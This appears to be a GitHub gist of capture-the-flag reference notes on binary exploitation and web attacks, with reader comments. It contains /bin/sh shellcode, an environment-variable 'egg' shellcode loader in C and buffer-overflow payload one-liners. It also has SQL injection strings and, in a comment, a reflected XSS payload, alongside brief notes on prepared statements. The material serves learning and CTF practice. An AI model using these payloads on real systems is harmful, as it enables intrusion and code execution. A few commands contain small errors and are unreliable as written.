Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Quick reference for CTF

Commands for exploiting software vulnerabilities

Dot-dot and directory traversal attacks

This is where noobs start. If you are not sure what this is, this guide might not make much sense to you.

Linking

ls -sf /tmp/target /tmp/link

Binary to ASM

Using objdump

objdump -S binary.out | less

ELF sections Pic - Adam Doupe

View strings in binary

Using strings

strings binary.out
#or
objdump -s binary.out | less

Checking system calls

Man for ltrace and strace.

ltrace -f binary.out
strace -f binary.out

Debugging with GDB

(tutorial)

r binary.out
b <line_number/memory_address>
c (continues)
attach (ongoing process)
set detach-on-fork off (attach to forked child)

Ensuring same address works in debug mode and runtime is extremely important. Use this utility to make sure that the environment and argument stack remains the same in both the modes.

  • Invocation:
$ invoke.sh binary.out         # just call the executable
$ invoke.sh -d binary.out      # run the executable in GDB
  • Utility invoke.sh (don't forget to chmod +x invloke.sh)
!/bin/sh

while getopts "dte:h?" opt ; do
  case "$opt" in
    h|\?)
      printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
      exit 0
      ;;
    t)
      tty=1
      gdb=1
      ;;
    d)
      gdb=1
      ;;
    e)
      env=$OPTARG
      ;;
  esac
done

shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
shift
if [ -n "$gdb" ] ; then
  if [ -n "$tty" ]; then
    touch /tmp/gdb-debug-pty
    exec env - $env TERM=screen PWD=$PWD gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
  else
    exec env - $env TERM=screen PWD=$PWD gdb --args $prog "$@"
  fi
else
  exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi

Ref - stackoverflow

Shell code for /bin/sh from shell-storm

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

Buffer overflow

Create a new shell code that injects your code ('/bin/sh') into a new env variable, and invokes the corresponding shell. (tutorial)

/* eggcode.c */
#include <unistd.h>
#define NOP 0x90
 
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x64\x55"
"\x55\x4d\x68\x41\x68\x6d\x61\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50"
"\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
 
int main(void)
{
  char shell[512];
 
  puts("Eggshell loaded into environment.\n");
  memset(shell,NOP,512);     /* fill-up the buffer with NOP */
/* fill-up the shellcode on the second half to the end of buffer */
  memcpy(&shell[512-strlen(shellcode)],shellcode,strlen(shellcode));
  /* set the environment variable to */
  /* EGG and shell as its value, rewrite if needed */
  setenv("EGG", shell, 1);
  /* modify the variable */
  putenv(shell);
  /* invoke the bash */
  system("bash");
  return 0;
}

Gets address of the first instruction of the malacious code

/* findeggaddr.c */
#include <unistd.h>
 
int main(void)
{
  printf("EGG address: 0x%lx\n", getenv("EGG"));
  return 0;
}

Exploit using overflow buffer - calculate stack address and inject using python or perl script. Eg.

`python -c "print 'A'x516 + '\x73\xf5\xff\xbf'"`
`perl -e 'print "A"x516'``printf "\x73\xf5\xff\xbf"`

Please keep in mind

  • Endianess (inverse memory address)
  • checking env after injecting shell code
  • size of datatypes (char-1, int-4, float-8, double-16 etc.) when overflowing buffers
Declaration Allocation in memory
first lower mem address
last higher mem address

process structure Pic - Adam Doupe


SQL Injection cheat sheet

Checking for SQL injection:

  • Normal
' or 1=1 --
  • Blind returns same response for both if there is a user with user_name h4x0r
pressRelease.jsp?id=5
pressRelease.jsp?id=5 AND user_name()=‘h4x0r’
  • Second Order injection Set user to john-- and change actual john's password using:
update users set password=where username ='john'--'

Please ensure you see the cheat sheet for the correct technology. Here is the one for MySQL.

Making client side requests

curl -H 'header=value' <ip/hostname>:<port>
curl -b PHPSESSID=n7591kbbse8rug4dfn019skv05 -F oid=5929 -F price=2500 -F cur=usd http://192.168.84.167/code/purchase.php
nc <destination> <port> < input.txt #sending data to stdin

xinetd

  • Executable in /etc/xinetd.d
service <service_name>
{
        socket_type     = stream
        protocol        = tcp
        user            = <user_executing_this>
        wait            = no
        server          = /<path_to_binary>/<binary_with_x_permissions>
        log_type        = SYSLOG daemon debug
}
  • Add service to /etc/services
<service_name>       11000/tcp
  • Restart xinetd (we only need to do this if we change name of executable after patch)
sudo /etc/init.d/xinetd restart

Preventing vulnerabilites

Specify query structure and then provide parameters

$stmt = $db->prepare("select * from `users` where `username` = :name and `password` = SHA1( CONCAT(:pass, `salt`)) limit 1;"); 
$stmt->bindParam(':name', $name);
$stmt->bindParam(':pass', $pass);
  • Remote OS command execution - escapeshellcmd($str)
@sailik1991

This comment has been minimized.

Copy link
Owner Author

@sailik1991 sailik1991 commented May 2, 2016

At present add your updates to the comment section.

Please use markdown syntax
Use one comment per person. This will help us to give vulnerabilities depending on you speciality! :)

@ashuaeron

This comment has been minimized.

Copy link

@ashuaeron ashuaeron commented May 2, 2016

XSS Attacks:

  • Reflected XSS attack

Example:

<?php $name = $_GET['name']; ?>
<html>
    <body>
       <p> Hello <?= $name ?></p>
    </body>
</html>

Attack can take place by requesting untrusted data. Like

http://example.com?name=<script>alert('attack')</script>

sailik1991 - There are a thousand ways to evade checks and execute XSS
Here is a lost of all Filter Evasion techniques

@yugarsi

This comment has been minimized.

Copy link

@yugarsi yugarsi commented May 2, 2016

this is useful

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment